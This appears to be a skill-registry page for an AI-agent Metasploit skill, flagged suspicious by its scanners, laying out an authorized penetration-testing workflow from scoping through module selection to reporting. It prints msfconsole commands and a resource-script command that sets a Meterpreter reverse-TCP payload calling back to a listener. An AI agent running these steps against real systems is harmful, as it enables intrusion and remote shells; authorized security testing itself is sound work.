ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

metasploit

v1.0.0

Plan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tu...

1· 380· 1 versions· 1 current· 1 all-time· Updated 9h ago· MIT-0
by@zengyuxiu

Security Scans

VirusTotalSuspiciousClawScanSuspiciousStatic analysisBenign

Install

openclaw skills install metasploit-skill

OpenClaw Metasploit

Overview

Use this skill to run deterministic and auditable Metasploit workflows for authorized security testing. Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.

Workflow Decision Tree

  1. Confirm authorization and scope before any technical step.
  2. Collect target facts: service, version, network position, and constraints.
  3. Select candidate modules and payloads using module-selection.md.
  4. Generate and review a resource script with scripts/build_rc.py.
  5. Execute in msfconsole with check before run or exploit.
  6. Validate outcome with session and artifact evidence.
  7. Produce a concise report with reproducible commands and findings.

Step 1: Confirm Scope and Safety

Require explicit confirmation of:

  • Target ownership or testing authorization
  • In-scope hosts, ports, and time window
  • Forbidden techniques (DoS, persistence, data exfiltration)

If scope is unclear, stop and ask for clarification before proceeding.

Step 2: Build Target Context

Capture minimum actionable context:

  • Host and network placement
  • Service and version fingerprint
  • Authentication state
  • Environmental constraints (egress filtering, AV/EDR, uptime sensitivity)

Use this context to justify each module choice.

Step 3: Select Modules and Payloads

Use search and info in msfconsole to narrow candidates:

search type:exploit cve:2023 service:http
info exploit/linux/http/<module_name>
show options
show payloads

Choose modules by:

  • Reliability and target compatibility
  • Required options completeness
  • Post-exploit objective fit (shell type, architecture, privilege level)

For common mappings and tradeoffs, read module-selection.md.

Step 4: Generate Resource Script

Generate reproducible execution scripts:

python3 scripts/build_rc.py \
  --module exploit/linux/http/example_module \
  --rhosts 10.10.10.15 \
  --rport 8080 \
  --payload linux/x64/meterpreter/reverse_tcp \
  --lhost 10.10.10.5 \
  --lport 4444 \
  --set TARGETURI=/app \
  --check \
  --job \
  --output run_example.rc

Review generated commands before execution:

  • Confirm no out-of-scope hosts
  • Confirm payload and listener values
  • Confirm optional settings are intentional

Step 5: Execute in msfconsole

Run with logging enabled:

msfconsole -q -r run_example.rc

Inside msfconsole, verify:

  • check output status
  • run or exploit result
  • sessions -l visibility

If exploitation fails, adjust one variable at a time and re-run.

Step 6: Validate and Capture Evidence

Minimum evidence set:

  • Module path and key options
  • Command/script used for execution
  • Check result and exploit result
  • Session details (type, user, host)
  • Relevant non-sensitive proof artifacts

Use workflow.md for command-level checklists and reporting structure.

Step 7: Report

Produce output with:

  • Objective and scope
  • Reproducible steps
  • Outcome and confidence
  • Impact summary
  • Recommended remediation and verification method

Keep reports concise and technically verifiable.

Resources

scripts/build_rc.py

Generate a repeatable Metasploit .rc resource script from structured options.

references/module-selection.md

Module and payload selection heuristics with common service mappings.

references/workflow.md

Command checklist for execution, troubleshooting loop, and report field requirements.

Version tags

latestvk970q86emq40wqnqsrreh3e63x82qh7x